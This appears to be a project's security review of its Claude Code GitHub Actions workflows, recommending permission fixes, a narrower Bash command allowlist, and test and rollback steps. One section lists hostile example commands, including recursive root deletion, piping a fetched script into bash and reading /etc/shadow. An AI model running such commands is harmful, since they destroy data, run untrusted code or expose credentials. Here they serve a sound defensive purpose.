Claude Code Workflows - Recommended Fixes

Date: 2025-12-04
Priority: Medium
Impact: Security & Functionality Improvements

Summary

After analyzing the Claude Code GitHub Actions workflows, we identified:

  • 1 permission mismatch that may cause failures
  • 2 workflows with overly permissive security settings
  • 0 authentication bugs (everything works as designed!)

All issues are minor and the workflows are functional, but these improvements will enhance security and reliability.


Issue 1: Permission Mismatch in Code Review Workflow

File: .github/workflows/claude-code-review.yml
Severity: Medium (May cause workflow failures)
Status: Needs fix

Problem

The workflow grants Claude the ability to comment on PRs but doesn’t provide the required GitHub permissions:

permissions:
  contents: read
  pull-requests: read    # ← Read-only!
  issues: read
  id-token: write

# But allows:
claude_args: '--allowed-tools "...Bash(gh pr comment:*)..."'

When Claude attempts to run gh pr comment, the GitHub API will return 403 Forbidden because the workflow token only has pull-requests: read permission.

Impact

  • Code review workflow may fail when attempting to post comments
  • No security risk (just doesn’t work)
  • Users will see error messages in workflow logs

Solution

Option A: Grant Write Permission (Recommended)

permissions:
  contents: read
  pull-requests: write   # ← Change to write
  issues: read
  id-token: write

Option B: Remove Commenting Ability

claude_args: '--allowed-tools "Bash(gh issue view:*),Bash(gh search:*),Bash(gh issue list:*),Bash(gh pr diff:*),Bash(gh pr view:*),Bash(gh pr list:*)"'
# Removed: Bash(gh pr comment:*)

Recommendation: Use Option A. Code reviews are more valuable when Claude can post findings as PR comments.

Implementation

# Edit the file
code .github/workflows/claude-code-review.yml

# Change line 29 from:
#   pull-requests: read
# To:
#   pull-requests: write

# Commit the change
git add .github/workflows/claude-code-review.yml
git commit -m "fix(workflows): grant pull-requests write permission to claude-code-review

The claude-code-review workflow allows Claude to comment on PRs via
gh pr comment but only had pull-requests: read permission, which would
cause 403 Forbidden errors. Granting write permission fixes this.

Resolves permission mismatch identified in authentication analysis."

git push

Issue 2: Overly Permissive Bash Access

Files:

  • .github/workflows/claude-auto-fix.yml
  • .github/workflows/claude-clarification-response.yml

Severity: Low (Security best practice)
Status: Recommended improvement

Problem

Both workflows grant unrestricted Bash command execution:

claude_args: '--allowed-tools "Bash(*),Read,Write,Edit,Glob,Grep,Task"'
# ↑ Bash(*) allows ANY shell command!

This violates the principle of least privilege. While Claude is designed to be safe, if Claude were compromised or made an error, it could execute dangerous commands like:

  • rm -rf / (destructive file operations)
  • curl malicious-url | bash (remote code execution)
  • cat /etc/shadow (read sensitive system files)

Impact

  • Security risk if Claude’s behavior is manipulated
  • Harder to audit what commands Claude is allowed to run
  • No current functional issues (workflows work fine)

Solution

Restrict Bash access to specific command patterns:

# Change from:
claude_args: '--allowed-tools "Bash(*),Read,Write,Edit,Glob,Grep,Task"'

# To:
claude_args: '--allowed-tools "Bash(gh *),Bash(git *),Bash(npm test),Bash(npm run *),Read,Write,Edit,Glob,Grep,Task"'

This allows:

  • gh * - All GitHub CLI commands (needed for PRs, issues, comments)
  • git * - All git commands (needed for branches, commits)
  • npm test - Run tests (needed to verify fixes)
  • npm run * - Run npm scripts (needed for builds, linting)

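This blocks direct invocation of:

  • File system operations (rm, mv, cp)
  • Network operations (curl, wget)
  • System commands (sudo, ps, kill)

The allowlist limits which commands Claude can invoke directly; it is not a sandbox. gh and git still reach the network, and npm run * executes whatever scripts package.json defines, which the Write and Edit tools in the same list can modify. Keep the workflow token's permissions minimal as well.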

Implementation

For claude-auto-fix.yml:

# Edit the file
code .github/workflows/claude-auto-fix.yml

# Find line ~50 (in the Claude Auto-Fix step)
# Change:
#   claude_args: '--allowed-tools "Bash(*),Read,Write,Edit,Glob,Grep,Task"'
# To:
#   claude_args: '--allowed-tools "Bash(gh *),Bash(git *),Bash(npm test),Bash(npm run *),Read,Write,Edit,Glob,Grep,Task"'

For claude-clarification-response.yml:

# Edit the file
code .github/workflows/claude-clarification-response.yml

# Find line ~83 (in the Continue with Claude Fix step)
# Make the same change as above

Commit both changes:

git add .github/workflows/claude-auto-fix.yml .github/workflows/claude-clarification-response.yml

git commit -m "security(workflows): restrict Claude Bash access to specific commands

Replaced overly permissive Bash(*) wildcard with specific command
patterns following principle of least privilege:
- Bash(gh *) for GitHub CLI operations
- Bash(git *) for version control
- Bash(npm test) and Bash(npm run *) for testing/building

This prevents accidental or malicious execution of dangerous commands
while maintaining all required functionality.

Implements security recommendation from authentication analysis."

git push
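
Both findings above (Issue 1 and Issue 2) can be checked mechanically before a workflow change is merged. The following is an added example, not part of the project's workflows: the sample workflow text is constructed from the snippets on this page, WRITE_SCOPES is an assumed minimal mapping, and the parsing is line-based rather than a full YAML parse.

```python
import re

# Constructed samples mirroring the snippets on this page (not the project's real files).
REVIEW_WF = """\
permissions:
  contents: read
  pull-requests: read    # read-only
  issues: read
claude_args: '--allowed-tools "Bash(gh pr view:*),Bash(gh pr comment:*)"'
"""
AUTOFIX_WF = """\
permissions:
  contents: write
claude_args: '--allowed-tools "Bash(*),Read,Write,Edit,Glob,Grep,Task"'
"""

# gh subcommands that write, and the token scope each needs (assumed minimal table).
WRITE_SCOPES = {"gh pr comment": "pull-requests", "gh issue comment": "issues"}

def permissions(text):
    """Scope -> level pairs from `permissions:` blocks (line-based, not a full YAML parse)."""
    perms, in_block = {}, False
    for line in text.splitlines():
        m = re.match(r"\s+([\w-]+):\s*(read|write|none)\b", line)
        if in_block and m:
            perms[m.group(1)] = m.group(2)
        else:
            in_block = line.strip() == "permissions:"
    return perms

def allowed_tools(text):
    """Tool patterns from every --allowed-tools argument, split on top-level commas."""
    return [t.strip() for arg in re.findall(r'--allowed-tools\s+"([^"]*)"', text)
            for t in re.split(r",(?![^(]*\))", arg) if t.strip()]

def audit(text):
    """Findings for the two issues on this page: Bash(*) and write tools without write scope."""
    perms, findings = permissions(text), []
    for tool in allowed_tools(text):
        if tool.replace(" ", "") == "Bash(*)":
            findings.append("Bash(*) allows any shell command")
        for cmd, scope in WRITE_SCOPES.items():
            if tool.startswith(f"Bash({cmd}") and perms.get(scope) != "write":
                findings.append(f"{tool} needs {scope}: write, token has {perms.get(scope, 'none')}")
    return findings

if __name__ == "__main__":
    for name, wf in (("review", REVIEW_WF), ("auto-fix", AUTOFIX_WF)):
        print(name, audit(wf))
```

Run against the real files in CI, a non-empty result from audit() is a reason to fail the check. A broad pattern such as Bash(gh *) is not matched against WRITE_SCOPES, so it still needs manual review.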

Issue 3: Missing Tool Permission Documentation

Files: All workflow files
Severity: Low (Maintenance)
Status: Optional improvement

Problem

The claude_args configuration lacks inline documentation explaining why specific tools are granted. This makes it harder for future maintainers to understand the security model.

Solution

Add comments documenting tool permissions:

# Tool Permissions Explanation:
# - Bash(gh *): Required for GitHub CLI operations (PRs, issues, comments)
# - Bash(git *): Required for version control operations (branches, commits)
# - Bash(npm test): Required for running tests to verify fixes
# - Bash(npm run *): Required for build and lint operations
# - Read,Write,Edit: Required for file modifications
# - Glob,Grep: Required for code analysis and search
# - Task: Required for multi-step workflows
claude_args: '--allowed-tools "Bash(gh *),Bash(git *),Bash(npm test),Bash(npm run *),Read,Write,Edit,Glob,Grep,Task"'

Implementation

Add these comments to all workflows that use claude_args. This is a documentation-only change and doesn’t affect functionality.


Testing Plan

After implementing fixes, verify:

1. Test Code Review Workflow

# Create a test PR
git checkout -b test/code-review-permissions
echo "# Test PR" >> test-file.md
git add test-file.md
git commit -m "test: verify code review permissions"
git push -u origin test/code-review-permissions
gh pr create --title "Test: Code Review Permissions" --body "Testing Claude code review workflow"

# Trigger Claude review (workflow should auto-trigger on PR creation)
# Or manually trigger with @claude mention in PR comment

# Verify Claude can post comments
gh pr view --comments

2. Test Auto-Fix Workflow

# Create a test issue
gh issue create --title "Test: Auto-fix permissions" --body "Testing restricted Bash permissions" --label "bug"

# Add auto-fix label
gh issue list --label "bug" --json number --jq '.[0].number' | xargs -I {} gh issue edit {} --add-label "auto-fix"

# Monitor workflow
gh run watch

# Verify workflow completes successfully
gh run list --workflow=claude-auto-fix.yml --limit 1

# Verify Claude can still run required commands
# Check logs for successful gh/git/npm commands

3. Verify No Broken Functionality

After deploying fixes:

  • Code review workflow can post comments on PRs
  • Auto-fix workflow can create PRs
  • Auto-fix workflow can comment on issues
  • Clarification workflow responds to user input
  • All required commands (gh, git, npm) still work
  • No unauthorized commands can be executed

Rollback Plan

If any issues occur after deployment:

# Option 1: revert the most recent commit (git revert creates the revert commit itself)
git revert HEAD
git push

# Option 2: restore specific files from the previous commit, then commit
# (HEAD~1 assumes the change being rolled back is the most recent commit)
git checkout HEAD~1 .github/workflows/claude-code-review.yml
git checkout HEAD~1 .github/workflows/claude-auto-fix.yml
git checkout HEAD~1 .github/workflows/claude-clarification-response.yml
git commit -m "revert: rollback Claude workflow permission changes"
git push

Timeline

Recommended Implementation:

  • Issue 1 (Permission mismatch): Implement immediately (may cause failures)
  • Issue 2 (Bash permissions): Implement in next maintenance window
  • Issue 3 (Documentation): Implement when convenient

Total Effort: ~30 minutes

  • File edits: 10 minutes
  • Testing: 15 minutes
  • Documentation: 5 minutes

Additional Recommendations

1. Add CI/CD Integration (Optional Enhancement)

If you want Claude to analyze CI/CD failures, add to workflows:

permissions:
  actions: read        # ← Add this

steps:
  - uses: anthropics/claude-code-action@v1
    with:
      additional_permissions: |
        actions: read   # ← Add this

2. Monitor Workflow Logs

Set up monitoring for authentication issues:

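# Add to cron or CI/CD: search the logs of recent failed runs (gh run list alone prints only run titles)
gh run list --workflow=claude-auto-fix.yml --status failure --limit 10 --json databaseId --jq '.[].databaseId' |
  xargs -I {} gh run view {} --log-failed | grep -i "auth\|permission"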

3. Document in CLAUDE.md

Update project documentation to reference these analyses:

## GitHub Actions & Claude Integration

For detailed information about Claude Code workflows:
- [Authentication Analysis](./docs/github-actions/claude-code-authentication-analysis.md)
- [Quick Reference](./docs/github-actions/claude-code-quick-reference.md)
- [Recommended Fixes](./docs/github-actions/recommended-fixes.md)

Conclusion

All recommended fixes are low-risk, high-value improvements:

Benefits:

  • Improved security (principle of least privilege)
  • Better maintainability (documented permissions)
  • Fixed potential bug (PR commenting)

No Breaking Changes:

  • All workflows remain functional
  • No API changes
  • No user-facing impact

Status: Ready for implementation


Questions? See:


Momentum LMS © 2025. Distributed under the MIT license.